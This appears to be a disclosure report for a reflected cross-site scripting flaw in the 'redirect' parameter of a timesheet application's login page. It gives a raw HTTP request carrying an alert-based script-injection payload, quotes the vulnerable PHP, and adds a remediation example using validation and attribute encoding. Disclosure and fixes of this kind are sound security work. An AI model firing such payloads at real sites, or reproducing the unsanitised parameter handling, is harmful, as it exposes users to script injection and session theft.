To reproduce:

POST /login.php HTTP/1.1
Host: localhost
Content-Length: 108
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7
Connection: close

redirect="/><script>alert("XSS")</script><input style="disp...

There's a cross-site scripting vulnerability in the login form that allows an attacker to execute arbitrary HTML and JavaScript code via the "redirect" parameter.

Version: <=1.5.3

https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54

$redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : "";
?>
<html>
<head>
<title>Timesheet Login</title>
<?php include ("header.inc"); ?>
</head>
<body onLoad="document.loginForm.username.focus();">...
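One way to close this class of bug, as an added example that is not tsheetx code: validate the "redirect" value on input and HTML-encode it at the point of output. It assumes the value is echoed into a quoted HTML attribute (the sink is not shown in the excerpt above) and that legitimate targets are same-site relative paths; `safe_redirect_target()` and `attr()` are hypothetical helper names.

```php
<?php
// Added example, not project code. Assumption: $redirect ends up inside a
// quoted attribute such as <input type="hidden" name="redirect" value="...">.

// Hypothetical helper: accept only same-site relative paths, else a default.
function safe_redirect_target($raw, string $default = ''): string
{
    if (!is_string($raw) || $raw === '') {
        return $default;                    // missing value or array input
    }
    if (preg_match('/[\x00-\x1f\x7f\\\\]/', $raw)) {
        return $default;                    // control characters, backslashes
    }
    if ($raw[0] !== '/' || (strlen($raw) > 1 && $raw[1] === '/')) {
        return $default;                    // not a path, or "//host" form
    }
    return $raw;
}

// Hypothetical helper: encode a value for use inside an HTML attribute.
// ENT_QUOTES covers both " and ', so neither quoting style can be closed.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// In the login page this would replace the raw assignment:
//   $redirect = safe_redirect_target($_REQUEST['redirect'] ?? '');
// and every place the value is written into markup would use:
//   value="<?php echo attr($redirect); ?>"

// Constructed sample inputs (not taken from the report) to show the result.
$samples = [
    '/page.php?x=1&y=2',      // ordinary relative target, "&" gets encoded
    '"/><i>probe</i>',        // tries to close the attribute and the tag
    '//other.example/',       // scheme-relative URL to another host
    "/a\r\nX-Test: 1",        // embedded CR/LF
];
foreach ($samples as $s) {
    $out = attr(safe_redirect_target($s));
    printf("%-28s => value=\"%s\"\n", json_encode($s), $out);
}
```

Encoding at output is what removes the script injection; the path check is an extra restriction that only holds if the application never needs absolute redirect URLs.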